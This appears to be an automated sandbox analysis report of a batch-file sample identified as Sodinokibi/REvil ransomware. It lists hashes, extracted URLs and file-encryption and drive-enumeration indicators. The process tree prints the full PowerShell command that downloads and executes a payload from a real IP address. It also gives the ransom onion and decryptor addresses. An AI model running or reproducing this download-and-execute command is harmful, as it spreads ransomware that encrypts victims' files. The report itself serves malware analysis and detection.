Analysis
-
max time kernel
137s -
max time network
149s -
platform
windows10_x64 -
resource
win10 -
submitted
15-09-2020 21:10
Static task
static1
Behavioral task
behavioral1
Sample
ab140e9cdf481895e1fc3230b74a6163.bat
Resource
win7
Behavioral task
behavioral2
Sample
ab140e9cdf481895e1fc3230b74a6163.bat
Resource
win10
General
-
Target
ab140e9cdf481895e1fc3230b74a6163.bat
-
Size
222B
-
MD5
2c0b9ea7ff3eb83f39fbefb161432e0a
-
SHA1
660fc5ebdfc2b59488b46f4b4e05873d697a84e0
-
SHA256
765c8a1c379b68045e0723ad205edd2ebbdea57c003ec7fb78bb91868ff1d2bd
-
SHA512
fb4b97e568e0e8204ec9039cbf8f6c808a0f96feca4ff85f2bfec2279e09f3f53a8373035669ee04cc239a10920c2d6864b59ae35eeac04e09384959c36e0577
Malware Config
Extracted
http://185.103.242.78/pastes/ab140e9cdf481895e1fc3230b74a6163
Extracted
C:\ihcc6n0-readme.txt
sodinokibi
http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/0BB4174AE31E53C1
http://decryptor.cc/0BB4174AE31E53C1
Signatures
-
Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
-
Blacklisted process makes network request 54 IoCs
Processes:
powershell.exeflow pid process 9 3768 powershell.exe 12 3768 powershell.exe 14 3768 powershell.exe 16 3768 powershell.exe 18 3768 powershell.exe 20 3768 powershell.exe 22 3768 powershell.exe 24 3768 powershell.exe 26 3768 powershell.exe 28 3768 powershell.exe 30 3768 powershell.exe 32 3768 powershell.exe 34 3768 powershell.exe 36 3768 powershell.exe 39 3768 powershell.exe 41 3768 powershell.exe 43 3768 powershell.exe 45 3768 powershell.exe 47 3768 powershell.exe 49 3768 powershell.exe 51 3768 powershell.exe 53 3768 powershell.exe 55 3768 powershell.exe 57 3768 powershell.exe 59 3768 powershell.exe 61 3768 powershell.exe 63 3768 powershell.exe 65 3768 powershell.exe 67 3768 powershell.exe 68 3768 powershell.exe 70 3768 powershell.exe 72 3768 powershell.exe 74 3768 powershell.exe 76 3768 powershell.exe 78 3768 powershell.exe 80 3768 powershell.exe 82 3768 powershell.exe 84 3768 powershell.exe 86 3768 powershell.exe 88 3768 powershell.exe 90 3768 powershell.exe 93 3768 powershell.exe 95 3768 powershell.exe 97 3768 powershell.exe 99 3768 powershell.exe 101 3768 powershell.exe 103 3768 powershell.exe 105 3768 powershell.exe 107 3768 powershell.exe 109 3768 powershell.exe 111 3768 powershell.exe 113 3768 powershell.exe 115 3768 powershell.exe 117 3768 powershell.exe -
Modifies extensions of user files 4 IoCs
Ransomware generally changes the extension on encrypted files.
Processes:
powershell.exedescription ioc process File opened for modification \??\c:\users\admin\pictures\OutSync.tiff powershell.exe File renamed C:\Users\Admin\Pictures\OptimizeDismount.png => \??\c:\users\admin\pictures\OptimizeDismount.png.ihcc6n0 powershell.exe File renamed C:\Users\Admin\Pictures\OutSync.tiff => \??\c:\users\admin\pictures\OutSync.tiff.ihcc6n0 powershell.exe File renamed C:\Users\Admin\Pictures\SubmitUnprotect.raw => \??\c:\users\admin\pictures\SubmitUnprotect.raw.ihcc6n0 powershell.exe -
Enumerates connected drives 3 TTPs 25 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
powershell.exedescription ioc process File opened (read-only) \??\X: powershell.exe File opened (read-only) \??\Z: powershell.exe File opened (read-only) \??\B: powershell.exe File opened (read-only) \??\F: powershell.exe File opened (read-only) \??\I: powershell.exe File opened (read-only) \??\L: powershell.exe File opened (read-only) \??\Q: powershell.exe File opened (read-only) \??\S: powershell.exe File opened (read-only) \??\W: powershell.exe File opened (read-only) \??\G: powershell.exe File opened (read-only) \??\P: powershell.exe File opened (read-only) \??\R: powershell.exe File opened (read-only) \??\T: powershell.exe File opened (read-only) \??\U: powershell.exe File opened (read-only) \??\V: powershell.exe File opened (read-only) \??\E: powershell.exe File opened (read-only) \??\K: powershell.exe File opened (read-only) \??\O: powershell.exe File opened (read-only) \??\Y: powershell.exe File opened (read-only) \??\A: powershell.exe File opened (read-only) \??\H: powershell.exe File opened (read-only) \??\J: powershell.exe File opened (read-only) \??\M: powershell.exe File opened (read-only) \??\N: powershell.exe File opened (read-only) \??\D: powershell.exe -
Modifies service 2 TTPs 5 IoCs
Processes:
vssvc.exedescription ioc process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\SwProvider_{b5946137-7b9f-4925-af80-51abd60b20d5} vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer vssvc.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Processes:
powershell.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\t714c678f.bmp" powershell.exe -
Drops file in Program Files directory 27 IoCs
Processes:
powershell.exedescription ioc process File opened for modification \??\c:\program files\JoinFormat.svgz powershell.exe File opened for modification \??\c:\program files\CompressComplete.vbs powershell.exe File opened for modification \??\c:\program files\RedoUninstall.m3u powershell.exe File opened for modification \??\c:\program files\RestartOut.ttf powershell.exe File opened for modification \??\c:\program files\ExpandSync.xsl powershell.exe File opened for modification \??\c:\program files\SplitPop.gif powershell.exe File opened for modification \??\c:\program files\StartMerge.ex_ powershell.exe File opened for modification \??\c:\program files\UndoRead.aif powershell.exe File created \??\c:\program files\ihcc6n0-readme.txt powershell.exe File created \??\c:\program files (x86)\ihcc6n0-readme.txt powershell.exe File opened for modification \??\c:\program files\InvokeCompress.eps powershell.exe File opened for modification \??\c:\program files\TraceRename.png powershell.exe File opened for modification \??\c:\program files\AssertCompare.gif powershell.exe File opened for modification \??\c:\program files\GrantEnable.midi powershell.exe File opened for modification \??\c:\program files\WaitSplit.m4a powershell.exe File opened for modification \??\c:\program files\DebugSwitch.wmx powershell.exe File opened for modification \??\c:\program files\DenyRestart.htm powershell.exe File opened for modification \??\c:\program files\ResumeMount.mpp powershell.exe File opened for modification \??\c:\program files\ProtectFind.snd powershell.exe File opened for modification \??\c:\program files\ResizeSearch.3gp2 powershell.exe File opened for modification \??\c:\program files\AddCheckpoint.TS powershell.exe File opened for modification \??\c:\program files\BlockConnect.jpeg powershell.exe File opened for modification \??\c:\program files\BlockConnect.png powershell.exe File opened for modification \??\c:\program files\SelectApprove.rle powershell.exe File opened for modification \??\c:\program files\MountMeasure.ADTS powershell.exe File opened for modification \??\c:\program files\PushRemove.cr2 powershell.exe File opened for modification \??\c:\program files\StopSend.emf powershell.exe -
Suspicious behavior: EnumeratesProcesses 5 IoCs
Processes:
powershell.exepid process 3768 powershell.exe 3768 powershell.exe 3768 powershell.exe 3768 powershell.exe 3768 powershell.exe -
Suspicious use of AdjustPrivilegeToken 6 IoCs
Processes:
powershell.exevssvc.exedescription pid process Token: SeDebugPrivilege 3768 powershell.exe Token: SeDebugPrivilege 3768 powershell.exe Token: SeTakeOwnershipPrivilege 3768 powershell.exe Token: SeBackupPrivilege 2060 vssvc.exe Token: SeRestorePrivilege 2060 vssvc.exe Token: SeAuditPrivilege 2060 vssvc.exe -
Suspicious use of WriteProcessMemory 3 IoCs
Processes:
cmd.exedescription pid process target process PID 3828 wrote to memory of 3768 3828 cmd.exe powershell.exe PID 3828 wrote to memory of 3768 3828 cmd.exe powershell.exe PID 3828 wrote to memory of 3768 3828 cmd.exe powershell.exe
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\ab140e9cdf481895e1fc3230b74a6163.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:3828 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/ab140e9cdf481895e1fc3230b74a6163');Invoke-DFOZTCUZYBDAOQM;Start-Sleep -s 10000"2⤵
- Blacklisted process makes network request
- Modifies extensions of user files
- Enumerates connected drives
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3768
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Modifies service
- Suspicious use of AdjustPrivilegeToken
PID:2060